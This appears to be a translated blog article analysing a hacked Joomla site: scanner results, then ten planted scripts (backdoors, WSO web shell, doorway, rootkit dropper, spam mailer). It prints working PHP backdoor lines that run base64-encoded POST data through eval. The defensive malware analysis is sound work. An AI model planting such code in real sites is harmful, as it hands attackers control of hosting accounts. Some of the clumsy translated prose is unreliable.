Hacking a website and its results

The times when the sites were hacked just for fun have gone. Under modern conditions, the websites are attacked for getting a profit. Any website, even with low traffic and indexes, can be attacked.


The site hacking can be both directed and massive. Directed attacks mean that the hacker is personally interested in hacking a particular website. Massive attacks mean that hackers just want to test a particular set of vulnerabilities that emerged in a particular CMS.


Hacking sites has lots of options. Starting from the exploitation of vulnerabilities of the CMS system and server, to the selection of passwords or sending Trojans to retrieve saved passwords from FTP and admin panels. Even if your site is securely protected – you can be broken through vulnerable neighbors on shared-hosting with incorrect rights set. Attackers can monitor bugtraq-broadcasts for the emergence of various kinds of so-called vulnerabilities. zero day, collect vulnerable sites with the help of search engines and services and try to massively attack.


Usually, malefactors, proceeding from their goals and qualifications, try to gain a foothold in the hacked resource and disguise their presence. Hacking the site is not always possible to recognize by external signs (mobile redirect, spam links on pages, other people’s banners, deface, etc.). When the site is compromised, these external features may not be. The resource can work in the regular mode, without interruptions, errors and getting into the “black” lists of antiviruses. But this does not mean that the site is safe. The problem is that it is difficult to notice the fact of hacking and downloading hacker scripts without conducting a security audit, and the web shells themselves, backdoors, and other hacker tools can be hosted for a long time and not be used for their intended purpose. But once the moment comes, and they begin to be severely exploited by the attacker, causing the site owner to have problems. For spam, phishing pages are blocked on the hosting site (or disable some of the functionality), and the appearance of redirects or viruses on the pages is fraught with a ban from antivirus programs and sanctions from search engines. In such a case, it is necessary to urgently “cure” the site, and then put protection against hacking, so that the plot does not repeat.


What can an attacker get from a hacked site? First of all the information. The site can have a closed section, an online store can contain a user base, the site can integrate services with hard-coded credentials of third-party systems (for example, SMS gateways with a good balance), etc. that can be sold.


The site can be used for the extraction and sale of traffic – from the installation of seo-links to the introduction of iframe code leading to the so-called. exploit bundles – automated systems for exploiting browser vulnerabilities, flash players, etc.

Recently, more and more you can hear about the so-called purposeful attacks (advanced persistent threat, APT) in which hacking sites is not the last place. Hacking the web is often so-called. the entry point to the corporate network, from the web site get all the possible information to conduct an effective phishing company – analyzes the users, meta tags and service information of all possible documents contained on the site. Also, sites can be hacked during a watering-hole attack. The attacker does not attack the company’s main website (which can be perfectly protected), but related resources — the partner’s website, the labor exchange and other systems that are visited by the company’s employees. The registration data of employees of the company of interest can be extracted from these sites, as well as malicious software can be installed for attacks like drive by download. Such attacks can be ordered by unscrupulous competitors, government organizations. Also, on hacked sites, you can install software for sending spam and other programs from the arsenal of intruders.


Often, the owners do not know about hacking


Unfortunately, hacker scripts are not detected by external signs or external scanners. Therefore, neither the search engine antiviruses, nor the antivirus software installed on the computer by the webmaster on the computer, will report any site security issues. If the scripts are located somewhere in the system directories of the site (not in the root and not in the images) or injected into existing scripts, you will not be able to notice them by chance.


Our colleagues from Revizium, a company specializing in the treatment and protection of websites against viruses, provided an interesting case from their practice.


As ancient wisdom says: “forewarned is forearmed.” In order to imagine the “scale of disaster” when hacking, we suggest to get acquainted with the average Joomla site, which was hacked as a result of a non-targeted attack, see what hackers downloaded the site and what threat the downloaded scripts carry to the site, its owner and hosting. The incident occurred in July 2015.

Since it happens in exercise

The site is powered by Joomla version 2.5.28. The reason for the appeal is to block the site from the hosting side for spamming. In addition to analyzing the mail and web server logs, the site was scanned by three popular solutions for detecting malicious code on the hosting: AI-BOLIT, Maldet and ClamAv.


AI-BOLIT’ outcome: 206 malicious files:


Maldet outcome: 84 malicious files:



ClamAv outcome: 67 malicious files:



We also requested the original site version from the developers and compared the files using the git version control system. According to the results of the comparison and verification of the detected files, it turned out that AI-BOLIT had overdone it a bit, that is, it detected all the malware + about 15% was “false positive” (false positives). Clamav and Maldet found only half of all malicious programs, so we can conclude that these antiviruses are suitable for express infection check, but not suitable for the “treatment” of the site. When “curing”, all malicious and hacker scripts should be detected and deleted. If at least one backdoor or web shell remains, the site will be hacked again.


After the analysis, we dismantled the functionality of the detected “malware” and classified them.


In case of untargeted hacking, patterns of infection can be traced well, that is, the presence of similar types of malicious and hacker scripts randomly scattered in the site directories or embedded in .php files. The number of scripts of each type, their code may differ slightly with each infection of the site with viruses due to obfuscation and encryption, but the functionality of each type is preserved. By the way, from time to time a new type of backdoors is added to the pattern. A year ago, there was no number 2 and number 5.


This pattern of infection is typical for CMS Joomla, WordPress, and some commercial CMS.


Consider each script from this set.


Number 1 is a backdoor that is injected (embedded) at the beginning of a random .php file. When viewing the code, it is not immediately noticeable, since it is intentionally “broken” by whitespace characters to the right beyond the limits of the visible part of the screen (therefore, we always have “line breaks” mode enabled in the editor).


This plain record is a challenge:


if (isset ($ _ POST [‘n746521’])) eval (base64_decode ($ _ POST [‘n746521’]));


That is, arbitrary PHP code will be executed, which is encoded in base64 and transferred to the variable n746521 by the POST method. How dangerous is the site if this fragment remains in the file? It is very dangerous, because in fact it gives the attacker complete control over the hosting account: through it, you can execute any allowed PHP code, create or upload files to the hosting, send spam, execute database queries, and much more. And this injection is convenient for a hacker in that it is not a separate script that can be detected by logs. Requests with malicious load can be sent to index.php or any site URL. Therefore, this fragment needs to be cleaned from all .php files (there will be from 5 to 20 infected files). For a fragment, the variable name in the apostrophes changes, the other fragments are fixed.


Number 2 is the backdoor loader.



It performs authentication on the passed parameter, then does one of the following:

  1. executes the code passed in the parameter through

@eval (base64_decode ($ _ POST [“FFSW3525KKSfj”]))


  1. creates a file named Ffhwu22313_fff555ffsd.php, saves the contents to a file and connects it to the backdoor via @include_once, and then deletes it. Thus, it bypasses the restriction of the eval call if, for example, it is blocked on the hosting.


If the script is simply opened in the browser, then the status of 404 is given. Page not found. Thus, the backdoor is almost impossible to detect outside.


As well as # 1, the backdoor allows you to get full control over the hosting account, and in consequence, perhaps the entire server. But # 2 is more functional due to the eval bypass.


The good news for site owners is that the backdoor is placed in a separate php script, that is, it can be seen with the naked eye, and can also be found using find … –mtime … and find … -ctime …. File names are random sequences that are not found in the original version of the CMS, so it will be difficult to skip files when browsing directories.


Number 3 – it is a backdoor number 2.


Does the same, but does not know how to bypass the prohibited eval, that is, executes the transferred code only through

@eval (base64_decode ($ _ POST [‘FFSW3525KKSfj’])

Number 4 is the classic WSO web shell.



A web shell is a “food processor” that makes a hacker’s job convenient on a hosting. With WSO shell you can:

  1.  view hosting configuration;

  2.     work with files through a convenient file manager (create, delete, edit, download, etc.);

  3.     work with the database (change, delete data in tables and send any SQL queries);

  4.     perform various string conversions (encode, decode string values);

  5.     select passwords (brute force);

  6.     execute commands in command line mode;

  7.     execute arbitrary PHP code;

  8.     manage the site (for example, insert virus code into the database or javascript files) remotely and automatically.


If you remove the destructive functionality, then ordinary webmasters could use this tool. Sometimes it seems to us that the functionality of the control panels of some hosting sites is noticeably inferior to the capabilities of web shells.


Number 5 is a doorway that downloads content from a remote server:



If you decrypt it a bit, you can see from which IP the content is loaded and how it “pretends” to the User Agent:



Doorway generates thousands of black SEO pages. Pages fall into the search index and adversely affect the search results of the site, the original pages of which are pessimized. The site may fall under the filter or completely fly out of the search results.


Number 6 is a backdoor that accepts commands in the form of an encrypted PHP serialized array:



Control commands can be transmitted via POST variables or COOKIE. Backdoor supports commands:

  1. “I” – give PHP version and backdoor version;

  2. “E” – execute eval ($ data [“d”]) for the code that is transmitted in the request.


Fragment of the decrypted version of this backdoor:



Number 7 is another backdoor, which can be placed in a separate file up to 400 bytes in size, and injected into php scripts. It is a simplified option number 1 with the same disastrous consequences.



Number 8 – Mayhem rootkit dropper. This is perhaps the most dangerous “load” in this infection.



Rootkit Mayhem is a serious malware for web servers on OS * nix, which turns the server into a combat unit of a botnet, but can work under conditions of limited privileges. The task of this file is to generate a rootkit and load it via LD_PRELOAD.


Number 9 is a powerful spam mailer.


The rich functionality allows you to send spam both through the standard mail () function and using the SMTP protocol via sockets. Various letter templates, mailing lists, etc. are supported. The source code is well obfuscated. A fragment of the third step deobfuscation looks like this:



Number 10 is a dropper, the task of which is to load the executable shell file from a remote server, run it and delete it after completion. This script usually starts hacking the site.


The site from which the dropper loads the shell is also hacked. In this case, it is utilized as hosting for malicious code. After several hours, the shell file at this address is no longer available, so it is not possible to determine which code was executed at boot time.


As you can see, there is not a single virus or redirect here, that is, the site after hacking did not start to distribute malicious code, redirect visitors, show banners, phishing pages did not appear, etc. And “from the outside” it was possible to notice the hacking only after a couple of months when the doorway pages get into the search index.

I would like to note that the example analyzed in the content is not really some particularly difficult and insidious consequence associated with hacking the site. Upon most sites hacked therefore of a non-targeted strike, about the same factor is observed. The great news is that a person now really know what to offer with. As wisdom states, “forewarned is forearmed”.

Leave a Comment